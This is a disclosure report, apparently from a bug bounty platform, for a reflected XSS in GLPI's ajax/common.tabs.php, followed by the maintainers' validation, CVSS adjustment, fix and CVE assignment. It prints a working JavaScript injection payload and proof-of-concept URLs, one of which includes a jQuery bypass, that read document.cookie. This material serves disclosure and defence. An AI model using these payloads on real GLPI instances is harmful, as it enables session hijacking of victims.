Authenticated Reflected XSS on ajax/common.tabs.php in glpi-project/glpi

Valid

Reported on

Dec 12th 2022


Description

There is a reflected XSS vulnerability on ajax/common.tabs.php due to the KnowBase tab not escaping the start parameter properly (probably because it's not reflected inside quotes).

There was some work into getting the exploit working, due to JQuery's $() not being defined and causing a ReferenceError. This could be bypassed by re-defining a function with the same name that does nothing and then procceeding to write the payload after. After some tweaking, the payload looked like this:

1})}});alert(document.cookie);(function a(){function b(){(function c(){

Proof-of-Concept (PoC)

This PoC will trigger an alert containing the browser cookies.

http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=1})}});alert(document.cookie);(function%20a(){function%20b(){(function%20c(){

Impact

An attacker can persuade a victim into opening a URL containing a payload exploiting this vulnerability. After exploited, the attacker can make actions as the victim or exfiltrate session cookies.

We are processing your report and will contact the glpi-project/glpi team within 24 hours. a year ago
Celesian
a year ago

Researcher


I have provided the wrong PoC. The following PoC includes the undefined JQuery bypass.

http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=1})}});alert(document.cookie);function%20$(a){};(function%20a(){function%20b(){(function%20c(){
We have contacted a member of the glpi-project/glpi team and are waiting to hear back a year ago
glpi-project/glpi maintainer has acknowledged this report a year ago
Alexandre Delaunay validated this vulnerability a year ago
c3l3si4n has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Cédric Anne
a year ago

Maintainer


@admin we reevaluated the severity to 4.8 (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N). Could you please change this ?

Cédric Anne
a year ago

Maintainer


https://github.com/glpi-project/glpi/security/advisories/GHSA-352j-wr38-493c

Ben Harvie
a year ago

Admin


Hi Cédric Anne, I have updated the CVSS as you requested.

Cédric Anne marked this as fixed in 10.0.6 with commit 902e78 a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
Cédric Anne
a year ago

Maintainer


CVE-2023-22722

to join this conversation